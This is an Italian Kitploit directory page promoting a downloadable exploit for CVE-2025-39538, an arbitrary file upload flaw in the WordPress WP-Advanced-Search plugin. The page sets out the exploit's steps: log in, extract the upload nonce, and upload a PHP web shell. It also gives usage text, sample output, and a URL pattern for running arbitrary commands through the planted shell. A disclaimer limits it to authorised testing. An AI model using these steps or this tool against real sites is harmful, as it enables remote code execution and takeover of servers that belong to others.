Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-39538 — WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnerabilità di caricamento file arbitrario | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-39538
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-39538

CVE-2025-39538

WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnerabilità di caricamento file arbitrario

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 Caricamento Arbitrario di File

CVE-2025-39538
Pubblicato: 2025-04-16
Tipo di vulnerabilità: Caricamento Arbitrario di File (Caricamento senza restrizioni di file con tipo pericoloso)
Plugin interessato: WP-Advanced-Search di Mathieu Chartier
Versioni interessate: Tutte le versioni fino alla 3.3.9.3 inclusa

Questa vulnerabilità consente a un attaccante autenticato di caricare un file PHP malevolo (ad esempio una web shell) sul server utilizzando la funzionalità di importazione fornita dal plugin. Il file caricato viene posizionato nella directory degli upload di WordPress e potrebbe portare all'esecuzione di codice remoto.

🧱 Percorso di upload:

root@kitploit:~
wp-content/uploads/2025/04/

⚙️ Informazioni sullo Script di Exploit

Questo script Python esegue le seguenti azioni:

  1. Effettua il login al sito WordPress utilizzando le credenziali fornite.
  2. Estrae il nonce richiesto wp_advanced_search_up_nonce dalla pagina di amministrazione import/export.
  3. Carica una web shell (file PHP) tramite una richiesta POST modificata.

🚀 Utilizzo

root@kitploit:~
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

🖥️ Output di esempio:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).

🐚 Utilizzo della Shell Caricata

Dopo il caricamento, puoi accedere alla tua shell in questo modo:

root@kitploit:~
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami

Sostituisci whoami con qualsiasi comando Linux che desideri eseguire, ad esempio:

  • id — mostra l'ID utente corrente.
  • pwd — mostra la directory corrente.
  • ls — elenca i file.

⚠️ Disclaimer


Questo strumento è inteso esclusivamente per scopi di test di sicurezza educativi e autorizzati.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo script.


Di: Nxploited | Khaled Alenazi

Scarica lo strumento